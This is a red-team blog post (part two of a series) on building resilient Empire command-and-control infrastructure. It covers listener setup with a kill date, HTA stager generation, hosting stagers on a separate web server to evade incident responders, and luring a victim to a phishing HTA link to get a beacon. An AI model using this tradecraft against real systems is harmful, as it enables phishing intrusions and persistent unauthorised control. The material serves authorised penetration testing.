Rome Didn’t Fall in a Day: Building A Resilient Empire C2, Part Two

On By Jeremy JohnsonIn Red Team

[Originally posted on ImplicitDeny] – This write up is for Empire 1.5, but the same concepts and commands are the same.

In Part One we went over the reasons for having a resilient C2 infrastructure, and what it should look like. In summary, we want to have two or more internet accessible servers to host the different stages and classes of our Command and Control (C2). A host to store our short launcher scripts and files, and one or more hosts to act as C2. More control hosts for added resiliency and for enabling long-term control.  The reason for this is primarily evasion of an active blue team.

Assumptions: You know how to move around in Linux on the CLI and move files from one server to another via SCP or SFTP.

Let’s get started.

Login to your C2 server’s CLI and start Empire:

$ cd Empire/
$ sudo ./empire

Empire needs to be run as a superuser in order to bind to port 443.

Empire

With Empire up and running we need to configure a listener. For my engagements I like to configure a kill date in case something goes awry and the agent is unable to receive a manual kill command. This is good tradecraft.

(Empire) listeners
(Empire) set Name primaryC2
(Empire) set KillDate 06/12/2017
(Empire) set CertPath /home/user/Empire/data/empire.pem
(Empire) set Host https://commandcontrol1.com
(Empire) info
(Empire) execute

use “info” to verify your settings and then, “execute” to start the listener.

Listener

Now that our listener is set up, it’s time to create some stagers.

usestagers

We have dll, ducky, hop_php, hta, launcher, launcher_bat, launcher_vbs, macro, pth_wmis, stager, and war as our options. In the Empire 2.0 branch is a stager for the RegSrv32 .sct “hack” (via @subtee for this badass find), a personal favorite of mine.

For this demonstration we will be using the hta launcher as an example. Here’s a great write-up on how you would expand this to a phishing campaign.

hta_stager

Once you’ve configured all of your stagers we need to move some (or all) to our web host. I chose to tar-zip the files and scp them. This is done from either a different screen/tmux window, or another login shell.

move_stagers

$ tar -zcvf ../stagers/stagers.tgz .

Then copy the stagers.tgz to the webroot of your web server or a sub-folder if you choose.

web-stagers

Make sure you chown those files to www-data or that they are readable by www-data. Hosting your stagers here gives you access to them from potentially any asset in the client network (assuming non-whitelisted policies). It also gives you a separate location for your C2 should incident responders discover any of your initial stagers and the URL they are being pulled from. This would be critical if your phishing campaign was discovered and the initial web server blocked.

The attack setup looks something like this:

Screen Shot 2016-05-31 at 11.27.55 AM

Once you get a victim to click on http://totallynotphish.com/spreadsheet.hta and they click through the warning you’ll receive your beacon from Empire:

beacon

In a follow up post I’ll explain how to add a third server to this setup, with a bonus of passing yourself a meterpreter shell.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s